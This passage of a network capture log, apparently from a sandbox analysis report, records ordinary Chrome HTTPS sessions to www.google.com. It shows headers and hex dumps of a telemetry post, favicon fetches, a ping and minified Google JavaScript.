2024-12-12 21:40:41 UTC	447	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 6f 6e 65 67 6f 6f 67 6c 65 68 74 74 70 73 65 72 76 65 72 5f 32 30 32 34 31 32 30 39 2e 30 38 5f 70 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 37 32 39 2c 5b 5b 22 31 37 33 34 30 33 39 36 33 36 33 39 34 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 5b 5b 5b 37 30 38 38 31 5d 2c 35 33 38 2c 5b 5d 5d 5d 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 38 30 30 30 2c 6e Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_onegooglehttpserver_20241209.08_p0",null,null,[4,0,0,0,0]]],729,[["1734039636394",null,null,null,null,null,null,"[[[70881],538,[]]]",null,null,null,null,null,null,18000,n
2024-12-12 21:40:41 UTC	494	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://ogs.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:40:41 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:41 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-12 21:40:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49830	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:41 UTC	1378	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:42 UTC	706	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 17:47:29 GMT Expires: Fri, 20 Dec 2024 17:47:29 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 13992 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:42 UTC	684	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-12-12 21:40:42 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<
2024-12-12 21:40:42 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-12-12 21:40:42 UTC	1390	IN	Data Raw: 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBBF!4I
2024-12-12 21:40:42 UTC	576	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49832	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:41 UTC	1463	OUT	GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&zx=1734039639112&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:42 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-PKpbRTZUwAmlxzsu3Z8EnA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:42 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49833	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:42 UTC	1147	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=aLUfP?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:43 UTC	825	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1522 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:32 GMT Expires: Fri, 12 Dec 2025 21:40:32 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 10 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:43 UTC	565	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 79 28 22 61 4c 55 66 50 22 29 3b 0a 76 61 72 20 56 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 51 72 3d 61 7d 3b 76 61 72 20 57 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4f 6e 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 77 69 6e 64 6f 77 3d 61 2e 73 65 72 76 69 63 65 2e 77 69 6e 64 6f 77 2e 67 65 74 28 29 3b 74 68 69 73 2e 77 61 3d 74 68 69 73 2e 51 72 28 29 3b 74 68 69 73 2e 6f 61 3d 77 69 6e 64 6f 77 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3b 74 68 69 73 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 62 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.y("aLUfP");var VEb=function(a){this.Qr=a};var WEb=function(a){_.On.call(this);var b=this;this.window=a.service.window.get();this.wa=this.Qr();this.oa=window.orientation;this.ka=function(){var c=b
2024-12-12 21:40:43 UTC	957	IN	Data Raw: 28 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 6b 61 29 3b 22 6f 72 69 65 6e 74 61 74 69 6f 6e 22 69 6e 20 77 69 6e 64 6f 77 26 26 0a 74 68 69 73 2e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 74 68 69 73 2e 6b 61 29 7d 3b 5f 2e 47 28 57 45 62 2c 5f 2e 50 6e 29 3b 57 45 62 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 65 72 76 69 63 65 3a 7b 77 69 6e 64 6f 77 3a 5f 2e 51 6e 7d 7d 7d 3b 5f 2e 6d 3d 57 45 62 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 61 64 64 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 61 64 64 28 61 29 7d 3b 5f 2e 6d 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 Data Ascii: ("resize",this.ka);"orientation"in window&&this.window.addEventListener("orientationchange",this.ka)};_.G(WEb,_.Pn);WEb.Ha=function(){return{service:{window:_.Qn}}};_.m=WEb.prototype;_.m.addListener=function(a){this.listeners.add(a)};_.m.removeListener=f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49870	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:59 UTC	1160	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=lOO0Vd,sy8i,P6sQOc?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:59 UTC	825	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1558 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:35 GMT Expires: Fri, 12 Dec 2025 21:40:35 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 24 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:59 UTC	565	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 79 28 22 6c 4f 4f 30 56 64 22 29 3b 0a 5f 2e 6c 6d 62 3d 6e 65 77 20 5f 2e 5a 64 28 5f 2e 55 50 61 29 3b 0a 5f 2e 7a 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 73 6d 62 3b 5f 2e 74 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 63 75 61 3d 61 3b 74 68 69 73 2e 50 4f 63 3d 62 3b 74 68 69 73 2e 55 35 61 3d 63 3b 74 68 69 73 2e 61 54 63 3d 64 3b 74 68 69 73 2e 4b 31 63 3d 65 3b 74 68 69 73 2e 68 5a 61 3d 30 3b 74 68 69 73 2e 54 35 61 3d 73 6d 62 28 74 68 69 73 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.y("lOO0Vd");_.lmb=new _.Zd(_.UPa);_.z();}catch(e){_._DumpException(e)}try{var smb;_.tmb=function(a,b,c,d,e){this.cua=a;this.POc=b;this.U5a=c;this.aTc=d;this.K1c=e;this.hZa=0;this.T5a=smb(this
2024-12-12 21:40:59 UTC	993	IN	Data Raw: 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 50 36 73 51 4f 63 22 29 3b 0a 76 61 72 20 76 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 5f 2e 51 61 28 61 2e 59 61 62 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 62 5b 65 5d 3d 21 30 7d 29 3b 76 61 72 20 63 3d 61 2e 67 61 62 28 29 2c 64 3d 61 2e 72 61 62 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 74 6d 62 28 61 2e 71 61 62 28 29 2c 5f 2e 76 64 28 63 2c 31 29 2a 31 45 33 2c 61 2e 76 24 61 28 29 2c 5f 2e 76 64 28 64 2c 31 29 2a 31 45 33 2c 62 29 7d 2c 77 6d 62 3d 21 21 28 5f 2e 42 68 5b 32 37 5d 3e 3e 32 38 26 31 29 3b 76 61 72 20 78 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6b 61 3d 5f 2e 64 65 28 5f 2e 6e 6d 62 29 3b 74 Data Ascii: _DumpException(e)}try{_.y("P6sQOc");var vmb=function(a){var b={};_.Qa(a.Yab(),function(e){b[e]=!0});var c=a.gab(),d=a.rab();return new _.tmb(a.qab(),_.vd(c,1)1E3,a.v$a(),_.vd(d,1)1E3,b)},wmb=!!(_.Bh[27]>>28&1);var xmb=function(){this.ka=_.de(_.nmb);t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49893	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:41:06 UTC	766	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:41:07 UTC	706	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 17:47:29 GMT Expires: Fri, 20 Dec 2024 17:47:29 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 14018 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
